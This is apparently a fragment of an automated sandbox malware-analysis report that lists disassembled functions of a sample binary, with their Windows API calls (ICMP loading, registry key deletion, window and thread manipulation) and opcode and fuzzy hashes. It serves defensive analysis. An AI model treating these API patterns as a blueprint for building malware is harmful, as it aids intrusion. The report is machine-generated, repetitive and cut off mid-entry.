                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                              • API String ID: 2574300362-3530519716
                                                                                              • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                              • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                                                              • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                                                              • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                                                              Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: ICMP.DLL$IcmpCreateFile
                                                                                              • API String ID: 2574300362-275556492
                                                                                              • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                              • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                                                              • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                                                              • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                                                              Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                                                              • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: ICMP.DLL$IcmpSendEcho
                                                                                              • API String ID: 2574300362-58917771
                                                                                              • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                              • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                                                              • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                                                              • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                                                              Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                                                              • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProc
                                                                                              • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                              • API String ID: 2574300362-4033151799
                                                                                              • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                              • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                                                              • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                                                              • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                                                              Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VariantInit.OLEAUT32(?), ref: 0047950F
                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                                                              • VariantClear.OLEAUT32(?), ref: 00479650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Variant$AllocClearCopyInitString
                                                                                              • String ID:
                                                                                              • API String ID: 2808897238-0
                                                                                              • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                              • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                                                              • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                                                              • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                                                              Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                                                              • __itow.LIBCMT ref: 004699CD
                                                                                                • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                                                              • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                                                              • __itow.LIBCMT ref: 00469A97
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$__itow
                                                                                              • String ID:
                                                                                              • API String ID: 3379773720-0
                                                                                              • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                              • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                                                              • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                                                              • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                                                              Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                                                              • ScreenToClient.USER32(?,?), ref: 00449A80
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Window$ClientMoveRectScreen
                                                                                              • String ID:
                                                                                              • API String ID: 3880355969-0
                                                                                              • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                              • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                                                              • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                                                              • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                                                              Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                              • String ID:
                                                                                              • API String ID: 2782032738-0
                                                                                              • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                              • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                              • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                                                              • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                              Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                                              • GetWindowRect.USER32(?,?), ref: 00441722
                                                                                              • PtInRect.USER32(?,?,?), ref: 00441734
                                                                                              • MessageBeep.USER32(00000000), ref: 004417AD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Rect$BeepClientMessageScreenWindow
                                                                                              • String ID:
                                                                                              • API String ID: 1352109105-0
                                                                                              • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                              • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                                                              • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                                                              • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                                                              Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                                              • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                                              • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                                              • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                              • String ID:
                                                                                              • API String ID: 3321077145-0
                                                                                              • Opcode ID: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                              • Instruction ID: 6818256dd78c2cb29ac0ce267de24fb792dca3a41353b59757f5ace631f71379
                                                                                              • Opcode Fuzzy Hash: 49223ed515fb619a5bee3fab41eec0f0b951464039ac7af7222e30fa4423140a
                                                                                              • Instruction Fuzzy Hash: DC318DB1A00201EBDB10EFB5C945A1ABBE8AF45319F10885EFC44AB343CB79ED45CB94
                                                                                              Function 0042083F Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                                              • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                                              • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                              • String ID:
                                                                                              • API String ID: 3058430110-0
                                                                                              • Opcode ID: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                              • Instruction ID: f6550d230e50e909e13d2a99824cc28569674f7a7b9e5ef0daa2e7ce22e82e6e
                                                                                              • Opcode Fuzzy Hash: 6122c04dd5dc57efc0e5b6c0779ec963bae9ccf891294cd495d8fd5d7cdcec1f
                                                                                              • Instruction Fuzzy Hash: D731E231B00265EFDB20EF65E884AAF3BE5BF00310F55496AE4658B292D734CD80DB98
                                                                                              Function 0045039B Relevance: 6.1, APIs: 4, Instructions: 102COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetParent.USER32(?), ref: 004503C8
                                                                                              • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                                              • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                                              • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Proc$Parent
                                                                                              • String ID:
                                                                                              • API String ID: 2351499541-0
                                                                                              • Opcode ID: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                              • Instruction ID: 48835c6935d03606f494e5d0f95072c3389227be5880c4b08380f2331de9f088
                                                                                              • Opcode Fuzzy Hash: 953005dfd523491bc8661b2d189c1fe3a1d27544861a9947cd3b684206b02ae0
                                                                                              • Instruction Fuzzy Hash: F231B73A2001046BD720CF18DC94DAB7719EF97335B14461BFA298B3D3CB759856C769
                                                                                              Function 00442A83 Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                                              • TranslateMessage.USER32(?), ref: 00442B01
                                                                                              • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$Peek$DispatchTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 1795658109-0
                                                                                              • Opcode ID: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                              • Instruction ID: 5e5183f3b0572ad37d893cec5a7cf9421d6c1ddc4b80b1975d6d8daaa3c1acd1
                                                                                              • Opcode Fuzzy Hash: 36eab9d42bd73f6f728abf92f57c3db94032fb3fd80da71d70c6aa8f6f72699a
                                                                                              • Instruction Fuzzy Hash: 012126719583469AFB30DF649D85FB7BBA8CB24314F40407BF91097281EAB86848C769
                                                                                              Function 0047438B Relevance: 6.1, APIs: 4, Instructions: 83COMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                                                • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                              • GetCaretPos.USER32(?), ref: 004743B2
                                                                                              • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                                              • GetForegroundWindow.USER32 ref: 004743EE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.1531677876.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000002.00000002.1531658458.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531727320.0000000000482000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531750651.0000000000490000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531769169.0000000000491000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.0000000000492000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531784283.00000000004A8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.1531820298.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_400000_x.jbxd
                                                                                              Similarity
                                                                                              • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                              • String ID:
                                                                                              • API String ID: 2759813231-0
                                                                                              • Opcode ID: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                              • Instruction ID: 29594bdffde582d62cf8cb535202cb0f6e37f5c0e74140e0e8dac686a3932322
                                                                                              • Opcode Fuzzy Hash: f13b499454a1a1822ca13fc8ae6b328d463f7326d10c65fcbffa9176c03fd335
                                                                                              • Instruction Fuzzy Hash: 2F21AC71A00305ABD710EF75CC86B9E77B9AF44708F14446EF644BB2C2DBF9A9408BA5
                                                                                              Function 004494A5 Relevance: 6.1, APIs: 4, Instructions: 83windowCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
